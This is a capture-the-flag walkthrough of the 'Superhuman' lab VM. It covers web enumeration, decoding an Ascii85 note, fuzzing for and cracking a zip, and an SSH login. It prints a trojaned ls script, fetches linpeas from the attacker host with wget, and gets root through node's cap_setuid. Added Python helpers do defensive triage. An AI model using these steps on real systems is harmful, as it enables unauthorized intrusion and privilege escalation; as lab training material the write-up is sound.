Superhuman
Todd

Information Gathering

IP=192.168.0.154
nmap $IP -p- -sV -A


Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-16 00:20 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.32% done; ETC: 00:20 (0:00:03 remaining)
Nmap scan report for 192.168.0.154
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)
| 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)
|_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)
53/tcp filtered domain
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:8C:77:0A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.0.154

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds




Port 80 is open. Visiting it gives a blank page; view the source:

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252" />
</head>
<body>
<p>
<img
src="index_fichiers/nietzsche.jpg"
alt=""
style="display: block; margin-left: auto; margin-right: auto;"
>
</p>
<!-- If your eye was sharper, you would see everything in motion, lol -->
</body>
</html>

Request the image directly: it does not exist:

curl http://192.168.0.154/index_fichiers/nietzsche.jpg

Returns 404.

Trying the /index_fichiers/ directory also gives 404.

Drop the directory and request the image at the web root, and it is there. Judging by the filename, is that Nietzsche?

[image: nietzsche.jpg, served from the web root]

The comment at the bottom of the HTML, "If your eye was sharper, you would see everything in motion, lol", reads as a hint: look harder and you will see something moving.

So what is moving? Run a directory scan first. Nothing at the web root, and switching to http://192.168.0.154/index_fichiers/ turns up nothing either.

gobuster dir -u http://192.168.0.154/index_fichiers/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,7z,zip,pdf

No luck with paths, so download the image and check it for steganography:

curl -o nietzsche.jpg http://192.168.0.154/nietzsche.jpg
└─# steghide info nietzsche.jpg
"nietzsche.jpg":
format: jpeg
capacity: 1.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

Encrypted? Then there may really be something embedded. One caveat: steghide prints exactly this message for any JPEG when the passphrase is wrong, so it is not proof that data is embedded. Let's see how to crack it anyway:

└─# stegseek --crack nietzsche.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.79% (133.2 MB)
[!] error: Could not find a valid passphrase.

Damn, no passphrase.

Stuck for now. But remembering the old advice: when you have no information, try a bigger wordlist. Start by swapping the scanning wordlist:

gobuster dir -u http://192.168.0.154/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,7z,zip,pdf

Sure enough, it finds /notes-tips.txt.

└─# curl http://192.168.0.154/notes-tips.txt
F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c

Bake it in CyberChef: this is Base85 (Ascii85). Decoded:

salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.

I must not forget to save it and put a good extension because I don't have much storage.
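Recognising the encoding by eye is the fiddly part of this step. The following is an added example, not part of the original write-up: a small Python helper that runs the usual strict decoders (hex, Base32, Base64, Ascii85, RFC 1924 Base85) over an unknown blob and keeps only the candidates whose output is mostly printable. The sample input is constructed inside the block by encoding a known sentence, so the expected answer is exact; the NOTE_FROM_PAGE constant is the blob from notes-tips.txt copied as it appears above, and it will only decode if that copy is byte-exact.

```python
import base64
import binascii
import string

# Constructed sample: a note in the style of notes-tips.txt, Ascii85-encoded
# here so that the expected plaintext is known exactly.
SAMPLE_PLAINTEXT = "salome doesn't want me... I'll name it salome_and_?? I don't know."
SAMPLE_A85 = base64.a85encode(SAMPLE_PLAINTEXT.encode()).decode()

# The blob served by the target, copied from the curl output on this page.
NOTE_FROM_PAGE = r"""F(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC/g+jUD'3nBEb-A+De'u)F!,")@:UuC/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl/c"""

PRINTABLE = set(string.printable.encode())


def _codecs():
    # (name, strict decoder). Strict means foreign characters raise instead
    # of being silently dropped, which is what turns garbage into a false hit.
    return [
        ("hex", lambda s: binascii.unhexlify(s)),
        ("base32", lambda s: base64.b32decode(s, casefold=False)),
        ("base64", lambda s: base64.b64decode(s, validate=True)),
        ("ascii85", lambda s: base64.a85decode(s)),
        ("base85 (RFC 1924)", lambda s: base64.b85decode(s)),
    ]


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; 0.0 for empty input."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def identify_encoding(blob: str, threshold: float = 0.95) -> list:
    """Return [(codec_name, decoded_text)] for every codec whose output is at
    least `threshold` printable, best first. Undecodable inputs are skipped."""
    raw_in = blob.strip().encode()
    hits = []
    for name, dec in _codecs():
        try:
            out = dec(raw_in)
        except (ValueError, binascii.Error):
            continue
        ratio = printable_ratio(out)
        if out and ratio >= threshold:
            hits.append((ratio, name, out.decode("latin-1")))
    hits.sort(key=lambda t: t[0], reverse=True)  # stable: codec order breaks ties
    return [(name, text) for _, name, text in hits]


if __name__ == "__main__":
    for label, blob in (("constructed sample", SAMPLE_A85), ("notes-tips.txt", NOTE_FROM_PAGE)):
        hits = identify_encoding(blob)
        print(f"== {label}: {len(hits)} candidate(s)")
        for name, text in hits:
            print(f"[{name}]\n{text}\n")
```

CyberChef's Magic operation performs the same kind of search. The reason for `validate=True` and the per-codec exception handling is that lenient decoders quietly discard characters outside their alphabet and hand back bytes that can look like a partial hit.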


This is like a riddle. Still, my guess is salome and something. And with little storage, a "good extension" is probably a compressed one: zip? Or gz? 7z? So fuzz both the word and the extension:

echo 'zip' > zip.txt
echo 'gz' >> zip.txt
echo '7z' >> zip.txt

└─# wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -z file,/root/zip.txt --sc 200 http://192.168.0.154/salome_and_FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.0.154/salome_and_FUZZ.FUZ2Z
Total requests: 168492

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000004600: 200 0 L 20 W 436 Ch "me - zip"
000005637: 404 9 L 31 W 275 Ch "current - 7z"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending

Total time: 50.35108
Processed Requests: 5635
Filtered Requests: 5634
Requests/sec.: 111.9141

Found the zip file.
Download:

curl -o salome_and_me.zip  http://192.168.0.154/salome_and_me.zip
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 452 100 452 0 0 200k 0 --:--:-- --:--:-- --:--:-- 220k

Unzip:

└─# unzip salome_and_me.zip
Archive: salome_and_me.zip
[salome_and_me.zip] salome_and_me.txt password:

Well, well, a password too.

zip2john salome_and_me.zip > zip.hash
└─# john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (salome_and_me.zip/salome_and_me.txt)
1g 0:00:00:00 DONE (2025-08-16 01:29) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is turtle.

Unzip:

unzip -P turtle salome_and_me.zip

└─# cat salome_and_me.txt

----------------------------------------------------

GREAT POEM FOR SALOME

----------------------------------------------------


My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!


So the name is fred. Probably an SSH user? Quick try:

ssh [email protected]

I tried the earlier turtle: no. salome: no, looks like the love is really gone. Against all expectation, the password is schopenhauer. Nothing but seething hatred.

I wanted to browse the files, but as soon as I ran ls the SSH session was closed:

┌──(root㉿kali)-[~/Superman]
└─# ssh [email protected]
[email protected]'s password:
Linux superhuman 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 16 01:36:17 2025 from 192.168.0.30
fred@superhuman:~$
fred@superhuman:~$
fred@superhuman:~$ ls
lol
Connection to 192.168.0.154 closed.

Weird. Fine, I'll use tab completion instead:

fred@superhuman:~$ file
.bash_history .bashrc .local/ user.txt
.bash_logout cmd.txt .profile
fred@superhuman:~$ file user.txt
user.txt: ASCII text
fred@superhuman:~$ cat user.txt

Got user.txt.

Privilege Escalation

fred@superhuman:~$ sudo -l
-bash: sudo: command not found

No sudo; try linpeas.sh:

wget http://192.168.0.30/linpeas.sh
sh linpeas.sh | tee out

But since every call to ls kills its caller, linpeas died partway through and showed nothing useful.

Looks like this ls needs fixing first.

 which ls
/usr/bin/ls
fred@superhuman:~$ cat which ls^C
fred@superhuman:~$ cat /usr/bin/ls
echo "lol"
kill -9 "$(ps --pid $$ -oppid=)"

fred@superhuman:~$ busybox ls
cmd.txt linpeas.sh out user.txt
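What the trojaned ls actually does: the file has no shebang, so when bash's execve() fails with ENOEXEC it falls back to running the file as a shell script. Inside that script `$$` is the PID of the shell running it, `ps --pid $$ -o ppid=` prints that shell's parent, which is your interactive login shell, and `kill -9` on it tears down the SSH session. Below is an added example, not from the write-up: a Python check that classifies files by their magic bytes and flags any expected coreutils that are not ELF binaries. The bin directory it scans is a constructed fixture containing the exact two-line script seen above plus a fake ELF `cat`, and the short EXPECTED_ELF list is a hypothetical starting point. On the real host you would run `suspicious_tools("/usr/bin")` and confirm with `dpkg -V coreutils`, which reports files whose recorded checksum no longer matches.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

# Hypothetical short list of tools that must be compiled binaries on a Debian
# box; extend it from `dpkg -L coreutils procps` on a real host.
EXPECTED_ELF = {"ls", "cat", "id", "ps", "kill", "find"}


def classify(path: str) -> str:
    """Classify a file by its first bytes: 'elf', 'script' (has a shebang),
    'text' (no shebang but decodes as UTF-8) or 'other'."""
    with open(path, "rb") as f:
        head = f.read(512)
    if head.startswith(ELF_MAGIC):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    try:
        head.decode("utf-8")
    except UnicodeDecodeError:
        return "other"
    return "text"


def suspicious_tools(bindir: str, expected=EXPECTED_ELF) -> dict:
    """Return {name: classification} for every expected tool present in
    bindir that is NOT an ELF binary (the 'lol' ls on this box qualifies)."""
    found = {}
    for name in sorted(expected):
        p = os.path.join(bindir, name)
        if os.path.isfile(p):
            kind = classify(p)
            if kind != "elf":
                found[name] = kind
    return found


def make_demo_bindir() -> str:
    """Constructed fixture: a directory with the trojan 'ls' seen in
    /usr/bin/ls on the target and a stub ELF 'cat' (header only)."""
    d = tempfile.mkdtemp(prefix="fakebin-")
    ls = os.path.join(d, "ls")
    with open(ls, "w") as f:
        f.write('echo "lol"\nkill -9 "$(ps --pid $$ -oppid=)"\n')
    os.chmod(ls, 0o755)
    cat = os.path.join(d, "cat")
    with open(cat, "wb") as f:
        f.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 61)  # ELF64 header-sized stub
    os.chmod(cat, 0o755)
    return d


if __name__ == "__main__":
    demo = make_demo_bindir()
    print(suspicious_tools(demo))  # the trojan ls is reported, the ELF cat is not
```

Until the binary is replaced, anything that lists a directory without calling ls works as a substitute: `echo *`, `printf '%s\n' *`, `find . -maxdepth 1`, or the `busybox ls` the write-up uses next.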

But busybox is present, so we can use busybox to run ls:

fred@superhuman:~$ alias ls='busybox ls'
fred@superhuman:~$ ls
cmd.txt linpeas.sh out user.txt

That works. So add alias ls='busybox ls' to the top of linpeas.sh (this takes effect because the script is run with sh; bash does not expand aliases in non-interactive scripts unless shopt -s expand_aliases is set).

Then run linpeas.sh again:

fred@superhuman:~$ sh linpeas.sh -a | tee out


One highlighted finding stands out:

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
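cap_setuid+ep on node means every node process starts with CAP_SETUID effective, so `process.setuid(0)` succeeds with no password and no SUID bit, and the shell it spawns inherits uid 0. Only the uid changes: the id output below still shows gid=1000(fred), because cap_setgid is not granted. The manual check behind that linpeas line is `getcap -r / 2>/dev/null`. As an added example, not from the write-up, here is a Python triage of that output: it parses both the classic `path = cap+ep` format and the newer libcap `path cap=ep` format, ignores a known-good baseline (ping with cap_net_raw is stock Debian), and separates effective capabilities from merely permitted ones. The sample lines are constructed: the two real findings from this box plus two invented entries (python3.7 and arping) to exercise the other branches.

```python
import re

# Capabilities that bypass the normal uid/permission model. Any of these on a
# general-purpose interpreter or tool is a direct path to root.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

# Expected on a stock Debian install; not a finding by itself.
BASELINE = {"/usr/bin/ping": {"cap_net_raw"}}

REASON_EFFECTIVE = "effective dangerous capability"
REASON_PERMITTED = "dangerous capability, not effective (binary must raise it)"

# Matches '/usr/bin/node = cap_setuid+ep' (libcap < 2.41) and
# '/usr/bin/node cap_setuid=ep' (newer libcap getcap output).
LINE_RE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>cap_\S+)$")


def parse_getcap(line: str):
    """Parse one getcap line into (path, {cap names}, flags) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps_field = m.group("caps")
    sep = re.search(r"[+=]", caps_field)  # flags follow '+' or '='
    if sep:
        names, flags = caps_field[:sep.start()], caps_field[sep.end():]
    else:
        names, flags = caps_field, ""
    return m.group("path"), set(names.split(",")), flags


def triage(lines):
    """Return [(path, sorted risky caps, reason)] for entries worth a look."""
    findings = []
    for line in lines:
        parsed = parse_getcap(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        if BASELINE.get(path) == caps:
            continue
        risky = caps & DANGEROUS
        if not risky:
            continue
        reason = REASON_EFFECTIVE if "e" in flags else REASON_PERMITTED
        findings.append((path, sorted(risky), reason))
    return findings


# Constructed sample: the two lines linpeas reported on this box, plus two
# invented entries to show the baseline skip and the permitted-only case.
SAMPLE = """
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
/usr/bin/python3.7 = cap_dac_read_search,cap_net_bind_service+p
/usr/sbin/arping = cap_net_raw+ep
""".strip().splitlines()


if __name__ == "__main__":
    for path, caps, why in triage(SAMPLE):
        print(f"{path}: {caps} ({why})")
```

A capability that is only permitted (+p) is still worth noting: the program itself cannot use it until it raises it into the effective set, but anything that can make the binary do that (a plugin, an interpreter's FFI) gets the same result.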

See: https://gtfobins.github.io/gtfobins/node/#capabilities

fred@superhuman:~$ node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
# id
uid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
# cd /root/
# bash
root@superhuman:/root# busybox ls
root.txt
root@superhuman:/root# cat root.txt

Summary

Big wordlists, big wordlists, big wordlists.
Important things get said three times.

In the end I never used the image steganography.

If the system behaves strangely, check whether busybox is present; if it is, use busybox to run commands. If it is not, copy one over from the attacking host.
Use alias flexibly to work around such restrictions; the ls calls inside linpeas.sh can be handled by the same alias.
